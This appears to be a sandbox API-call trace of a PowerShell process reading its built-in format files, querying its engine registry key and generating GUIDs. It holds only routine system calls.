	[0771.097] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0771.097] GetFileType (hFile=0x318) returned 0x1
	[0771.097] SetErrorMode (uMode=0x1) returned 0x1
	[0771.097] GetFileType (hFile=0x318) returned 0x1
	[0771.097] ReadFile (in: hFile=0x318, lpBuffer=0x313ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313ed38*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.097] ReadFile (in: hFile=0x318, lpBuffer=0x313ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313ed38*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.097] ReadFile (in: hFile=0x318, lpBuffer=0x313ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313ed38*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.098] ReadFile (in: hFile=0x318, lpBuffer=0x313ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313ed38*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.098] ReadFile (in: hFile=0x318, lpBuffer=0x313ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313ed38*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.098] ReadFile (in: hFile=0x318, lpBuffer=0x313ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313ed38*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.098] ReadFile (in: hFile=0x318, lpBuffer=0x313ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313ed38*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.099] ReadFile (in: hFile=0x318, lpBuffer=0x313ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313ed38*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.099] ReadFile (in: hFile=0x318, lpBuffer=0x313ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313ed38*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.100] ReadFile (in: hFile=0x318, lpBuffer=0x313ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313ed38*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.100] ReadFile (in: hFile=0x318, lpBuffer=0x313ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313ed38*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.100] ReadFile (in: hFile=0x318, lpBuffer=0x313ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313ed38*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.100] ReadFile (in: hFile=0x318, lpBuffer=0x313ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313ed38*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.101] ReadFile (in: hFile=0x318, lpBuffer=0x313ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313ed38*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.101] ReadFile (in: hFile=0x318, lpBuffer=0x313ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313ed38*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.101] ReadFile (in: hFile=0x318, lpBuffer=0x313ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313ed38*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.101] ReadFile (in: hFile=0x318, lpBuffer=0x313ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313ed38*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.102] ReadFile (in: hFile=0x318, lpBuffer=0x313ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313ed38*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.102] ReadFile (in: hFile=0x318, lpBuffer=0x313ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313ed38*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.103] ReadFile (in: hFile=0x318, lpBuffer=0x313ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313ed38*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.103] ReadFile (in: hFile=0x318, lpBuffer=0x313ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313ed38*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.103] ReadFile (in: hFile=0x318, lpBuffer=0x313ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313ed38*, lpNumberOfBytesRead=0x1cd458*=0xe67, lpOverlapped=0x0) returned 1
	[0771.104] ReadFile (in: hFile=0x318, lpBuffer=0x313e307, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313e307*, lpNumberOfBytesRead=0x1cd458*=0x0, lpOverlapped=0x0) returned 1
	[0771.104] ReadFile (in: hFile=0x318, lpBuffer=0x313ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x313ed38*, lpNumberOfBytesRead=0x1cd458*=0x0, lpOverlapped=0x0) returned 1
	[0771.104] CloseHandle (hObject=0x318) returned 1
	[0771.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0771.104] SetErrorMode (uMode=0x1) returned 0x1
	[0771.105] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd400 | out: lpFileInformation=0x1cd400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0771.105] SetErrorMode (uMode=0x1) returned 0x1
	[0771.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0771.105] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd4e8 | out: phkResult=0x1cd4e8*=0x318) returned 0x0
	[0771.105] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd46c, lpData=0x0, lpcbData=0x1cd468*=0x0 | out: lpType=0x1cd46c*=0x1, lpData=0x0, lpcbData=0x1cd468*=0x56) returned 0x0
	[0771.105] CoTaskMemAlloc (cb=0x5a) returned 0x288e990
	[0771.105] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd43c, lpData=0x288e990, lpcbData=0x1cd438*=0x56 | out: lpType=0x1cd43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd438*=0x56) returned 0x0
	[0771.105] CoTaskMemFree (pv=0x288e990) 
	[0771.106] RegCloseKey (hKey=0x318) returned 0x0
	[0771.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0771.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0771.107] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x765f496a, Data2=0x5f56, Data3=0x483f, Data4=([0]=0x97, [1]=0xc7, [2]=0xee, [3]=0xf, [4]=0x7, [5]=0x53, [6]=0x6b, [7]=0x6b))) returned 0x0
	[0771.108] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x41f43b8, Data2=0xca56, Data3=0x4ea2, Data4=([0]=0xa2, [1]=0x88, [2]=0x63, [3]=0x73, [4]=0x59, [5]=0xcc, [6]=0x8d, [7]=0x28))) returned 0x0
	[0771.108] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x886d75f, Data2=0xc92b, Data3=0x42b2, Data4=([0]=0x83, [1]=0x25, [2]=0x40, [3]=0xaf, [4]=0x34, [5]=0x42, [6]=0x4d, [7]=0xfb))) returned 0x0
	[0771.108] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x245772c7, Data2=0x7472, Data3=0x417c, Data4=([0]=0x94, [1]=0xeb, [2]=0x3a, [3]=0x16, [4]=0xf3, [5]=0xd2, [6]=0xe8, [7]=0x89))) returned 0x0
	[0771.108] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x489bb9ca, Data2=0x87fe, Data3=0x4d96, Data4=([0]=0x84, [1]=0x8f, [2]=0x62, [3]=0x19, [4]=0xa, [5]=0x4d, [6]=0xe1, [7]=0x4f))) returned 0x0
	[0771.108] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xe94b3105, Data2=0x1b90, Data3=0x4ec0, Data4=([0]=0xa5, [1]=0x6c, [2]=0xc0, [3]=0xd4, [4]=0x94, [5]=0xe1, [6]=0xf0, [7]=0x8b))) returned 0x0
	[0771.108] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x6d03ff8a, Data2=0x651b, Data3=0x4f03, Data4=([0]=0x89, [1]=0x30, [2]=0x7a, [3]=0x59, [4]=0x90, [5]=0xb1, [6]=0x6, [7]=0xb))) returned 0x0
	[0771.109] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xf63b0395, Data2=0x55a, Data3=0x4f80, Data4=([0]=0x83, [1]=0xc4, [2]=0x52, [3]=0x91, [4]=0x8e, [5]=0x1e, [6]=0xd8, [7]=0xe0))) returned 0x0
	[0771.109] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x91e72630, Data2=0x7024, Data3=0x41bd, Data4=([0]=0x9a, [1]=0x95, [2]=0x84, [3]=0xe6, [4]=0x56, [5]=0x17, [6]=0x55, [7]=0x1c))) returned 0x0
	[0771.109] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x8b56a49c, Data2=0x13e2, Data3=0x4c44, Data4=([0]=0xbb, [1]=0xfa, [2]=0x6f, [3]=0xa8, [4]=0x7d, [5]=0x48, [6]=0xe8, [7]=0x48))) returned 0x0
	[0771.109] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x6af5ab36, Data2=0x74d9, Data3=0x491e, Data4=([0]=0x81, [1]=0xd5, [2]=0xd2, [3]=0x5a, [4]=0xda, [5]=0x9f, [6]=0x42, [7]=0x52))) returned 0x0
	[0771.109] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xb943648f, Data2=0x74fd, Data3=0x4598, Data4=([0]=0x84, [1]=0xed, [2]=0x5c, [3]=0xd3, [4]=0xbf, [5]=0xe3, [6]=0x69, [7]=0x9f))) returned 0x0
	[0771.109] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xdefdeeaf, Data2=0x9169, Data3=0x4618, Data4=([0]=0x99, [1]=0x5b, [2]=0xa4, [3]=0xb, [4]=0xb8, [5]=0x7d, [6]=0xb5, [7]=0x9))) returned 0x0
	[0771.110] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xc4ed6011, Data2=0x4d50, Data3=0x49ac, Data4=([0]=0x8d, [1]=0xe6, [2]=0x7b, [3]=0x3a, [4]=0x5d, [5]=0xf9, [6]=0xd2, [7]=0x5f))) returned 0x0
	[0771.110] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x137a1dcb, Data2=0x5f8e, Data3=0x4bea, Data4=([0]=0x9d, [1]=0x65, [2]=0xd5, [3]=0x5f, [4]=0x15, [5]=0xa2, [6]=0xd1, [7]=0x94))) returned 0x0
	[0771.110] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x74df0745, Data2=0x4a4, Data3=0x47d6, Data4=([0]=0x80, [1]=0xde, [2]=0x3f, [3]=0x1a, [4]=0x4a, [5]=0xea, [6]=0x48, [7]=0x5b))) returned 0x0
	[0771.110] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x9aa30b8b, Data2=0x73c5, Data3=0x459e, Data4=([0]=0x9f, [1]=0xa, [2]=0x90, [3]=0x9, [4]=0xe5, [5]=0xee, [6]=0x83, [7]=0x59))) returned 0x0
	[0771.110] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x77e96835, Data2=0x9ab, Data3=0x4f9e, Data4=([0]=0x87, [1]=0xbd, [2]=0xac, [3]=0x8, [4]=0x1, [5]=0xb4, [6]=0x20, [7]=0x48))) returned 0x0
	[0771.110] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xcdda5b7e, Data2=0x2395, Data3=0x466f, Data4=([0]=0x9b, [1]=0x36, [2]=0x34, [3]=0x0, [4]=0x2f, [5]=0x1c, [6]=0x4f, [7]=0xca))) returned 0x0
	[0771.111] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xd1288a5, Data2=0xa5f4, Data3=0x479e, Data4=([0]=0x9c, [1]=0xe, [2]=0xef, [3]=0x10, [4]=0x24, [5]=0x41, [6]=0xac, [7]=0x3e))) returned 0x0
	[0771.111] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xb1b6a9ae, Data2=0x8e67, Data3=0x41e7, Data4=([0]=0x9b, [1]=0xe4, [2]=0x1e, [3]=0x11, [4]=0x36, [5]=0xf9, [6]=0x80, [7]=0x63))) returned 0x0
	[0771.111] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xc8530bd5, Data2=0x5320, Data3=0x446f, Data4=([0]=0x8d, [1]=0xd0, [2]=0xc3, [3]=0xb5, [4]=0xe, [5]=0x8a, [6]=0x5f, [7]=0x48))) returned 0x0
	[0771.111] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xce51319b, Data2=0x9ee1, Data3=0x4138, Data4=([0]=0x89, [1]=0x3b, [2]=0x32, [3]=0x2b, [4]=0x55, [5]=0xd5, [6]=0x9e, [7]=0x76))) returned 0x0
	[0771.111] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xfe99f5bb, Data2=0xce51, Data3=0x403e, Data4=([0]=0x97, [1]=0x13, [2]=0x11, [3]=0xf1, [4]=0x53, [5]=0xa3, [6]=0x61, [7]=0xac))) returned 0x0
	[0771.111] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xb2863048, Data2=0x13e, Data3=0x40b1, Data4=([0]=0x8a, [1]=0xd1, [2]=0xca, [3]=0xeb, [4]=0xac, [5]=0x32, [6]=0xed, [7]=0x9d))) returned 0x0
	[0771.111] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xcb9bc11, Data2=0x2e2a, Data3=0x4c4e, Data4=([0]=0x84, [1]=0x4e, [2]=0xca, [3]=0x83, [4]=0x75, [5]=0x6b, [6]=0x75, [7]=0xda))) returned 0x0
	[0771.112] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x8772df92, Data2=0xa18f, Data3=0x40cd, Data4=([0]=0xa6, [1]=0x6, [2]=0x13, [3]=0xce, [4]=0x5b, [5]=0xb4, [6]=0xc6, [7]=0x51))) returned 0x0
	[0771.112] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x35641d63, Data2=0x3035, Data3=0x47f7, Data4=([0]=0x92, [1]=0xd0, [2]=0x0, [3]=0x77, [4]=0x60, [5]=0x2b, [6]=0x5c, [7]=0xb3))) returned 0x0
	[0771.112] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xce495fcc, Data2=0xfe69, Data3=0x4858, Data4=([0]=0x92, [1]=0x3d, [2]=0xfd, [3]=0xd6, [4]=0xd5, [5]=0xfc, [6]=0x6e, [7]=0x22))) returned 0x0
	[0771.112] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x8f3cb851, Data2=0x51e8, Data3=0x43b8, Data4=([0]=0x97, [1]=0x22, [2]=0x3d, [3]=0xcf, [4]=0x1d, [5]=0x1f, [6]=0x7b, [7]=0x91))) returned 0x0
	[0771.112] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xbaa6dba9, Data2=0x3549, Data3=0x42ad, Data4=([0]=0x94, [1]=0x44, [2]=0x9, [3]=0x95, [4]=0x80, [5]=0x2e, [6]=0xe2, [7]=0x22))) returned 0x0
	[0771.112] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x41cd216f, Data2=0xfe4f, Data3=0x4328, Data4=([0]=0x95, [1]=0x22, [2]=0x84, [3]=0x8e, [4]=0xd1, [5]=0x2e, [6]=0xb2, [7]=0x95))) returned 0x0
	[0771.112] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x829785dc, Data2=0xa489, Data3=0x46bd, Data4=([0]=0xaf, [1]=0xef, [2]=0x13, [3]=0x16, [4]=0x21, [5]=0xf1, [6]=0xc9, [7]=0x3a))) returned 0x0
	[0771.114] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xbebbff93, Data2=0xa63d, Data3=0x406c, Data4=([0]=0x94, [1]=0xdb, [2]=0x5f, [3]=0x3b, [4]=0x7d, [5]=0xa1, [6]=0xf9, [7]=0x8))) returned 0x0
	[0771.114] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xf987f2bb, Data2=0x527, Data3=0x4db4, Data4=([0]=0x87, [1]=0x23, [2]=0xcc, [3]=0x4d, [4]=0xc1, [5]=0x6, [6]=0x21, [7]=0x27))) returned 0x0
	[0771.114] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x6e308ef4, Data2=0xa791, Data3=0x4c80, Data4=([0]=0xb4, [1]=0xf8, [2]=0x33, [3]=0x24, [4]=0x3e, [5]=0xec, [6]=0x37, [7]=0x9))) returned 0x0
	[0771.114] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xc6bcc07c, Data2=0xe8d8, Data3=0x47b7, Data4=([0]=0xb4, [1]=0x6a, [2]=0x44, [3]=0xd7, [4]=0xd4, [5]=0xd9, [6]=0xaa, [7]=0x11))) returned 0x0
	[0771.115] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x2f82d506, Data2=0x705d, Data3=0x4075, Data4=([0]=0x89, [1]=0xd0, [2]=0x17, [3]=0x95, [4]=0x3a, [5]=0x18, [6]=0x9b, [7]=0x41))) returned 0x0
	[0771.115] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xa345066e, Data2=0xcdaf, Data3=0x450f, Data4=([0]=0x8e, [1]=0xc2, [2]=0x63, [3]=0xf4, [4]=0x66, [5]=0xae, [6]=0x3e, [7]=0xa4))) returned 0x0
	[0771.115] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xad5d857c, Data2=0x4d78, Data3=0x47f5, Data4=([0]=0x9e, [1]=0x5f, [2]=0x1d, [3]=0x3e, [4]=0x40, [5]=0xca, [6]=0xa3, [7]=0x69))) returned 0x0
	[0771.115] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xf4f43d04, Data2=0xb44b, Data3=0x4ada, Data4=([0]=0xbd, [1]=0xad, [2]=0x5d, [3]=0x33, [4]=0xad, [5]=0xd7, [6]=0xbb, [7]=0xa2))) returned 0x0
	[0771.115] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xbda5f722, Data2=0x9473, Data3=0x4d37, Data4=([0]=0x86, [1]=0x54, [2]=0xc2, [3]=0xc7, [4]=0xe9, [5]=0x3d, [6]=0xa0, [7]=0x58))) returned 0x0
	[0771.115] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xadc771a8, Data2=0xdbfe, Data3=0x486a, Data4=([0]=0xbf, [1]=0x12, [2]=0x7d, [3]=0x7, [4]=0xae, [5]=0xe7, [6]=0x7f, [7]=0x8a))) returned 0x0
	[0771.116] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xdb3a1695, Data2=0x1f6, Data3=0x4335, Data4=([0]=0x85, [1]=0x6, [2]=0x1f, [3]=0x67, [4]=0x81, [5]=0xfc, [6]=0x36, [7]=0x9d))) returned 0x0
	[0771.116] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x1e18acea, Data2=0xbd01, Data3=0x4554, Data4=([0]=0xa0, [1]=0x4f, [2]=0x7d, [3]=0x82, [4]=0x7f, [5]=0xc7, [6]=0xe4, [7]=0x5a))) returned 0x0
	[0771.116] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x741e79ec, Data2=0xeb77, Data3=0x4b75, Data4=([0]=0xa3, [1]=0xe7, [2]=0x96, [3]=0xac, [4]=0xcd, [5]=0x3d, [6]=0x97, [7]=0x84))) returned 0x0
	[0771.116] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xee7b794e, Data2=0xacb, Data3=0x4447, Data4=([0]=0x87, [1]=0x65, [2]=0x17, [3]=0x4b, [4]=0xd2, [5]=0xfb, [6]=0xb3, [7]=0x23))) returned 0x0
	[0771.116] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xbee9d47, Data2=0x8bf2, Data3=0x44e8, Data4=([0]=0xa7, [1]=0xc5, [2]=0x57, [3]=0x90, [4]=0x9d, [5]=0xfa, [6]=0x7a, [7]=0x3e))) returned 0x0
	[0771.116] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0771.117] GetFileType (hFile=0x318) returned 0x1
	[0771.117] SetErrorMode (uMode=0x1) returned 0x1
	[0771.117] GetFileType (hFile=0x318) returned 0x1
	[0771.117] ReadFile (in: hFile=0x318, lpBuffer=0x329ccd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x329ccd0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.117] ReadFile (in: hFile=0x318, lpBuffer=0x329ccd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x329ccd0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.117] ReadFile (in: hFile=0x318, lpBuffer=0x329ccd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x329ccd0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.118] ReadFile (in: hFile=0x318, lpBuffer=0x329ccd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x329ccd0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0771.118] ReadFile (in: hFile=0x318, lpBuffer=0x329ccd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x329ccd0*, lpNumberOfBytesRead=0x1cd458*=0x8b4, lpOverlapped=0x0) returned 1
	[0771.118] ReadFile (in: hFile=0x318, lpBuffer=0x329c0ec, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x329c0ec*, lpNumberOfBytesRead=0x1cd458*=0x0, lpOverlapped=0x0) returned 1
	[0771.118] ReadFile (in: hFile=0x318, lpBuffer=0x329ccd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x329ccd0*, lpNumberOfBytesRead=0x1cd458*=0x0, lpOverlapped=0x0) returned 1
	[0771.118] CloseHandle (hObject=0x318) returned 1
	[0771.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0771.118] SetErrorMode (uMode=0x1) returned 0x1
